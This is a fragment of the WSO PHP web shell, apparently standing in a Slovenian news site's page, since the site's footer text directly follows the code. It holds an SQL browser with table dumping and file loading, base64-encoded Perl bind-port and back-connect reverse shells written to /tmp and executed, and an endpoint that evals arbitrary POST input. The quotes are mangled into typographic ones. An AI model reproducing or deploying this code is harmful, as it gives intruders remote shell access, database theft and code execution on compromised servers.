if(!empty($_POST[’sql_base’])){

$db->selectdb($_POST[’sql_base’]);

echo "<tr><td width=1 style=’border-top:2px solid #666;’><span>Tables:</span><br><br>";

$tbls_res = $db->listTables();

while($item = $db->fetch($tbls_res)) {

list($key, $value) = each($item);

                    if(!empty($_POST[’sql_count’]))

                        $n = $db->fetch($db->query(’SELECT COUNT(*) as n FROM ’.$value.’’));

$value = htmlspecialchars($value);

echo "<nobr><input type=’checkbox’ name=’tbl[]’ value=’".$value."’>&nbsp;<a href=# onclick="st(’".$value."’,1)">".$value."</a>" . (empty($_POST[’sql_count’])?’&nbsp;’:" <small>({$n[’n’]})</small>") . "</nobr><br>";

}

echo "<input type=’checkbox’ onclick=’is();’> <input type=button value=’Dump’ onclick=’document.sf.p2.value="download";document.sf.submit();’><br>File path:<input type=text name=file value=’dump.sql’></td><td style=’border-top:2px solid #666;’>";

if(@$_POST[’p1’] == ’select’) {

$_POST[’p1’] = ’query’;

                    $_POST[’p3’] = $_POST[’p3’]?$_POST[’p3’]:1;

$db->query(’SELECT COUNT(*) as n FROM ’ . $_POST[’p2’]);

$num = $db->fetch();

$pages = ceil($num[’n’] / 30);

                    echo "<script>d.sf.onsubmit=function(){st("" . $_POST[’p2’] . "", d.sf.p3.value)}</script><span>".$_POST[’p2’]."</span> ({$num[’n’]} records) Page # <input type=text name=’p3’ value=" . ((int)$_POST[’p3’]) . ">";

                    echo " of $pages";

                    if($_POST[’p3’] > 1)

                        echo " <a href=# onclick=’st("" . $_POST[’p2’] . ’", ’ . ($_POST[’p3’]-1) . ")’>&lt; Prev</a>";

                    if($_POST[’p3’] < $pages)

                        echo " <a href=# onclick=’st("" . $_POST[’p2’] . ’", ’ . ($_POST[’p3’]+1) . ")’>Next &gt;</a>";

                    $_POST[’p3’]--;

if($_POST[’type’]==’pgsql’)

$_POST[’p2’] = ’SELECT * FROM ’.$_POST[’p2’].’ LIMIT 30 OFFSET ’.($_POST[’p3’]*30);

else

$_POST[’p2’] = ’SELECT * FROM `’.$_POST[’p2’].’` LIMIT ’.($_POST[’p3’]*30).’,30’;

echo "<br><br>";

}

if((@$_POST[’p1’] == ’query’) && !empty($_POST[’p2’])) {

$db->query(@$_POST[’p2’]);

if($db->res !== false) {

$title = false;

echo ’<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">’;

$line = 1;

while($item = $db->fetch()) {

if(!$title) {

echo ’<tr>’;

foreach($item as $key => $value)

echo ’<th>’.$key.’</th>’;

reset($item);

$title=true;

echo ’</tr><tr>’;

$line = 2;

}

echo ’<tr class="l’.$line.’">’;

$line = $line==1?2:1;

foreach($item as $key => $value) {

if($value == null)

echo ’<td><i>null</i></td>’;

else

echo ’<td>’.nl2br(htmlspecialchars($value)).’</td>’;

}

echo ’</tr>’;

}

echo ’</table>’;

} else {

echo ’<div><b>Error:</b> ’.htmlspecialchars($db->error()).’</div>’;

}

}

echo "<br></form><form onsubmit=’d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;’><textarea name=’query’ style=’width:100%;height:100px’>";

                if(!empty($_POST[’p2’]) && ($_POST[’p1’] != ’loadfile’))

                    echo htmlspecialchars($_POST[’p2’]);

                echo "</textarea><br/><input type=submit value=’Execute’>";

echo "</td></tr>";

}

echo "</table></form><br/>";

            if($_POST[’type’]==’mysql’) {

                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, ’@’, `host`) = USER() AND `File_priv` = ’y’");

                if($db->fetch())

                    echo "<form onsubmit=’d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;’><span>Load file</span> <input  class=’toolsInp’ type=text name=f><input type=submit value=’>>’></form>";

            }

if(@$_POST[’p1’] == ’loadfile’) {

$file = $db->loadFile($_POST[’p2’]);

echo ’<br/><pre class=ml1>’.htmlspecialchars($file[’file’]).’</pre>’;

}

} else {

        echo htmlspecialchars($db->error());

    }

echo ’</div>’;

wsoFooter();

}

function actionNetwork() {

wsoHeader();

$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";

$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";

echo "<h1>Network tools</h1><div class=content>

<form name=’nfp’ onSubmit="g(null,null,’bpp’,this.port.value);return false;">

<span>Bind port to /bin/sh [perl]</span><br/>

Port: <input type=’text’ name=’port’ value=’31337’> <input type=submit value=’>>’>

</form>

<form name=’nfp’ onSubmit="g(null,null,’bcp’,this.server.value,this.port.value);return false;">

<span>Back-connect  [perl]</span><br/>

Server: <input type=’text’ name=’server’ value=’". $_SERVER[’REMOTE_ADDR’] ."’> Port: <input type=’text’ name=’port’ value=’31337’> <input type=submit value=’>>’>

</form><br>";

if(isset($_POST[’p1’])) {

function cf($f,$t) {

$w = @fopen($f,"w") or @function_exists(’file_put_contents’);

if($w){

@fwrite($w,@base64_decode($t));

@fclose($w);

}

}

if($_POST[’p1’] == ’bpp’) {

cf("/tmp/bp.pl",$bind_port_p);

$out = wsoEx("perl /tmp/bp.pl ".$_POST[’p2’]." 1>/dev/null 2>&1 &");

            sleep(1);

echo "<pre class=ml1>$out ".wsoEx("ps aux | grep bp.pl")."</pre>";

            unlink("/tmp/bp.pl");

}

if($_POST[’p1’] == ’bcp’) {

cf("/tmp/bc.pl",$back_connect_p);

$out = wsoEx("perl /tmp/bc.pl ".$_POST[’p2’]." ".$_POST[’p3’]." 1>/dev/null 2>&1 &");

            sleep(1);

echo "<pre class=ml1>$out ".wsoEx("ps aux | grep bc.pl")."</pre>";

            unlink("/tmp/bc.pl");

}

}

echo ’</div>’;

wsoFooter();

}

function actionRC() {

if(!@$_POST[’p1’]) {

$a = array(

"uname" => php_uname(),

"php_version" => phpversion(),

"wso_version" => WSO_VERSION,

"safemode" => @ini_get(’safe_mode’)

);

echo serialize($a);

} else {

eval($_POST[’p1’]);

}

}

if( empty($_POST[’a’]) )

if(isset($default_action) && function_exists(’action’ . $default_action))

$_POST[’a’] = $default_action;

else

$_POST[’a’] = ’SecInfo’;

if( !empty($_POST[’a’]) && function_exists(’action’ . $_POST[’a’]) )

call_user_func(’action’ . $_POST[’a’]);

exit;Prikaži več novic

 
Oblikovanje, zamisel in izdelava: Bran©o